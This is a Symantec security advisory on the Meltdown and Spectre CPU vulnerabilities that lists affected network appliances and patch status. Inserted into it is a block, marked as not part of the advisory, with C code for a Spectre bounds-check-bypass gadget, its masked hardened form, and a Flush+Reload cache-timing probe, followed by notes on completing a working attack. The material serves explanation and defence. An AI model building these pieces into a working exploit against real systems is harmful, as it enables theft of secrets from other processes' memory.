SA161: Local Information Disclosure Due to Meltdown and Spectre Attacks

Security Advisory ID: SA161
Published Date: Jan 08, 2018
Advisory Status: Interim
Advisory Severity: Medium
CVSS v2 base score: 4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE Number:
CVE-2017-5715 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE-2017-5753 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)
CVE-2017-5754 - 4.7 (MEDIUM) (AV:L/AC:M/Au:N/C:C/I:N/A:N)

Symantec Network Protection products, which run on an affected CPU chipset and execute arbitrary code from external sources, are susceptible to several information disclosure vulnerabilities (aka Meltdown and Spectre attacks). An attacker who can execute arbitrary code locally on the target (for example, a remote attacker who has already obtained code execution on the appliance) can obtain sensitive information from the memory spaces of the same userspace application, other userspace applications, the operating system, or a VM hypervisor.

Affected Products:

The following products are vulnerable.  All hardware platforms are affected unless specified otherwise:

Content Analysis
CA 2.1, 2.2, and 2.3 are vulnerable to all CVEs when configured with on-box sandboxing.  CA 1.3 uses affected CPU chipsets, but does not allow administrators to execute arbitrary code and is not vulnerable to known vectors of attack.

Malware Analysis
MA 4.2 is vulnerable to all CVEs.

Security Analytics
Security Analytics 7.1, 7.2, and 7.3 are vulnerable to all CVEs when a malicious administrator executes malicious code on the appliance.

X-Series XOS
XOS 9.7, 10.0, and 11.0 are vulnerable to all CVEs when a malicious administrator accesses the XOS diagnostics functionality and executes malicious code on the appliance.  NPM-8620 (standalone and in X20 chassis), NPM-8650, and NPM-9600 platforms are not affected.

The following products use affected CPU chipsets, but do not allow administrators to execute arbitrary code and are not vulnerable to known vectors of attack:
Advanced Secure Gateway
CacheFlow
(CF5000-CX and CF5000-MX platforms are not affected by Meltdown)
Director
Mail Threat Defense
Management Center
Norman Shark Industrial Control System Protection
PacketShaper
PacketShaper S-Series
PolicyCenter S-Series
ProxyAV
ProxySG
(SG300, SG600, and SG9000 platforms are not affected by Meltdown)
Reporter 10.1
SSL Visibility

The following products run as userspace applications on customer-provided hardware platforms and operating systems. The vulnerabilities addressed in this security advisory are not present in our applications, but these applications can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable:
Android Mobile Agent
AuthConnector
BCAAA
Client Connector
Cloud Data Protection for Salesforce
Cloud Data Protection for Salesforce Analytics
Cloud Data Protection for ServiceNow
Cloud Data Protection for Oracle CRM On Demand
Cloud Data Protection for Oracle Field Service Cloud
Cloud Data Protection for Oracle Sales Cloud
Cloud Data Protection Integration Server
Cloud Data Protection Communication Server
Cloud Data Protection Policy Builder
General Auth Connector Login Application
HSM Agent for the Luna SP
IntelligenceCenter
IntelligenceCenter Data Collector
K9
PolicyCenter
ProxyClient
ProxyAV ConLog and ConLogXP
Reporter 9.5
Unified Agent

Advisory Details: 

Symantec Network Protection products, which run on an affected CPU chipset and execute arbitrary code from external sources, are susceptible to several information disclosure vulnerabilities.

The Meltdown attack (CVE-2017-5754) exploits an information disclosure vulnerability in CPU chipsets that support out-of-order execution. CPU chipsets from multiple vendors use out-of-order execution to improve instruction execution performance.  Modern operating systems rely on memory isolation between userspace applications and the operating system kernel.  If a userspace application attempts to access a memory location reserved for the operating system, the CPU raises an exception.  A CPU chipset supporting out-of-order execution may, however, fetch the protected data and execute further instructions that depend on it before the exception is taken.  Although the faulting load is never retired and its result is never architecturally visible, those transient instructions leave traces in the CPU cache (for example, which line of an attacker-controlled array was loaded) that are not rolled back when the exception is delivered.  A malicious userspace application can recover the protected data from those traces with a cache-timing side channel such as Flush+Reload.  Because the kernel typically maps all physical memory into its own address space, the Meltdown attack also allows a malicious userspace application to read sensitive data from the memory spaces of other userspace applications.

The Spectre attack (CVE-2017-5753 and CVE-2017-5715) exploits an information disclosure vulnerability in CPU chipsets that support speculative execution through branch prediction.  CPU chipsets from multiple vendors use branch prediction to improve instruction execution performance.  When the predictor guesses wrong, the CPU discards the architectural results of the speculatively executed instructions, but the cache state they leave behind is not rolled back.  A malicious userspace application can therefore obtain unauthorized access to sensitive data from the memory space of the same or a different userspace application by steering speculative execution toward code that reads the data, then recovering it from the CPU cache with a side channel.  In the first variant (CVE-2017-5753, bounds check bypass), the attacker trains a conditional branch, typically an array bounds check, so that a later call with an out-of-bounds index speculatively reads past the array before the check resolves.  In the second variant (CVE-2017-5715, branch target injection), the attacker poisons the branch target predictor so that an indirect branch in the victim speculatively executes an attacker-chosen gadget already present in the victim's address space.  CVE-2017-5715 may also allow malicious code running as a guest in a virtual machine to obtain unauthorized access to sensitive data from the VM hypervisor memory.
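The following is an added example, not code from this advisory or from Symantec, illustrating the bounds check bypass gadget described above beside a hardened form, together with the Flush+Reload cache probe that both the Spectre and the Meltdown descriptions rely on. All names (array1, array2, secret, index_mask_nospec, reload_cycles) and the "secret" string are constructed for illustration; the probe is x86-only and compiles to a stub elsewhere. The masking technique is the same idea as the Linux kernel's array_index_mask_nospec(): the clamp is a data dependency rather than a branch, so it holds even while the bounds check is being mispredicted.

```c
/* Spectre variant 1 (bounds check bypass): vulnerable gadget, hardened gadget,
 * and the cache-timing probe. Added example; not code from the advisory. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ARRAY1_SIZE 16
#define PAGE 4096

/* Victim data (constructed): a bounds-checked array and a "secret" that lives
 * elsewhere in the same address space, out of bounds of array1. */
uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
const char secret[] = "constructed secret value";
/* 256 page-spaced lines, one per possible byte value: the covert channel. */
uint8_t array2[256 * PAGE];
volatile uint8_t sink;

/* Vulnerable gadget: the bounds check is a branch, so the predictor can run
 * the body with an out-of-bounds x before the check retires. The transient
 * load array1[x] then selects a line of array2 according to the secret byte. */
void victim_vulnerable(size_t x) {
    if (x < ARRAY1_SIZE)
        sink = array2[array1[x] * PAGE];
}

/* Branchless clamp: all-ones when idx < size, zero otherwise. Computed from
 * data, not from a prediction, so it is correct on the speculative path too. */
size_t index_mask_nospec(size_t idx, size_t size) {
    /* size - 1 - idx wraps to a huge value exactly when idx >= size, setting
     * the top bit of the OR; shift it down to a single 0/1 flag. */
    size_t oob = (idx | (size - 1 - idx)) >> (sizeof(size_t) * 8 - 1);
    return oob - 1; /* 0 -> SIZE_MAX (keep idx), 1 -> 0 (clamp to element 0) */
}

/* Hardened gadget: even when the branch is mispredicted, x is forced to 0, so
 * the transient load can only touch array1[0] and reveals nothing new. */
void victim_hardened(size_t x) {
    if (x < ARRAY1_SIZE) {
        x &= index_mask_nospec(x, ARRAY1_SIZE);
        sink = array2[array1[x] * PAGE];
    }
}

/* The out-of-bounds index an attacker would call the gadget with after
 * training it: the distance from array1 to the secret, so array1[x] == secret[0]. */
size_t secret_index(void) {
    return (size_t)((uintptr_t)secret - (uintptr_t)array1);
}

/* What the hardened path actually dereferences for a given x. */
size_t effective_index(size_t x) {
    return x & index_mask_nospec(x, ARRAY1_SIZE);
}

/* Flush+Reload probe (x86-64 only): evict the line, let the victim run, then
 * time a reload. A fast reload means the transient load touched this line.
 * Timing is noisy; real attacks repeat the round many times and vote. */
#if defined(__x86_64__)
#include <x86intrin.h>
void flush_line(const void *p) { _mm_clflush(p); _mm_mfence(); }
uint64_t reload_cycles(const void *p) {
    unsigned aux;
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    sink = *(const volatile uint8_t *)p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#else
void flush_line(const void *p) { (void)p; }
uint64_t reload_cycles(const void *p) { (void)p; return 0; }
#endif

int main(void) {
    size_t x = secret_index();
    printf("secret lies %zu bytes past array1 (array1 has %d elements)\n", x, ARRAY1_SIZE);
    printf("hardened gadget would dereference array1[%zu]\n", effective_index(x));
    /* One probe round on the line for secret[0]: flush, run the gadget with the
     * out-of-bounds index, time the reload. Shows the channel, not a full PoC. */
    const uint8_t *line = &array2[(uint8_t)secret[0] * PAGE];
    flush_line(line);
    victim_vulnerable(x);
    printf("reload of array2[secret[0] * PAGE]: %llu cycles\n",
           (unsigned long long)reload_cycles(line));
    return 0;
}
```

A single probe round as in main() will not reliably show a hit: a working attack first trains the branch with many in-bounds calls, clears array2 from the cache, calls the gadget once with the malicious index, and then times all 256 lines, repeating until one value wins. The hardening shown here is one of several options; an LFENCE after the bounds check (as inserted by compiler flags such as MSVC's /Qspectre) serializes the check instead of masking the index, at a higher cost per check.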

The vulnerabilities addressed in this security advisory are not present in Symantec Network Protection products that run as userspace applications, but these applications can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable. Symantec urges our customers to contact their operating system and hardware platform vendors for Meltdown/Spectre vulnerability information and fixes.

Patches: 

Content Analysis
CA 2.3 - a fix is not available at this time.
CA 2.2 - a fix is not available at this time.
CA 2.1 - a fix is not available at this time.

Malware Analysis
MA 4.2 - a fix is not available at this time.

Security Analytics
Security Analytics 7.3 - a fix is not available at this time.
Security Analytics 7.2 - a fix is not available at this time.
Security Analytics 7.1 - a fix is not available at this time.

X-Series XOS
XOS 11.0 - a fix is not available at this time.
XOS 10.0 - a fix is not available at this time.
XOS 9.7 - a fix is not available at this time.

Advisory History: 

2018-04-22 CA 2.3 is vulnerable.
2018-04-01 All hardware platforms are affected unless specified otherwise in the Affected Products section.
2018-01-09 PolicyCenter (non S-Series) and Reporter 9.5 run as userspace applications on customer-provided hardware platforms and operating systems. The vulnerabilities addressed in this security advisory are not present in these applications, but they can be targeted by an attacker if the underlying hardware platforms and operating systems are vulnerable.
2018-01-08 initial public release